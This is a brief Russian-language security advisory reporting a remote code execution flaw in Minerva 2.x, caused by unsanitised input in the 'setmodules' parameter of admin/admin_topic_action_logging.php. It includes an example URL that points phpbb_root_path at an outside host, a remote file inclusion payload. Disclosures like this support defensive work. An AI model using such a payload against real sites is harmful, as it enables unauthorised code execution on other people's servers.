Программа: Minerva 2.x

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "setmodules" сценарием admin/admin_topic_action_logging.php.

Пример:

http://www.example.com/[Script Path]/admin/admin_topic_action_logging.php? setmodules=attach&phpbb_root_path=http://www.example2.com
 



Оставить мнение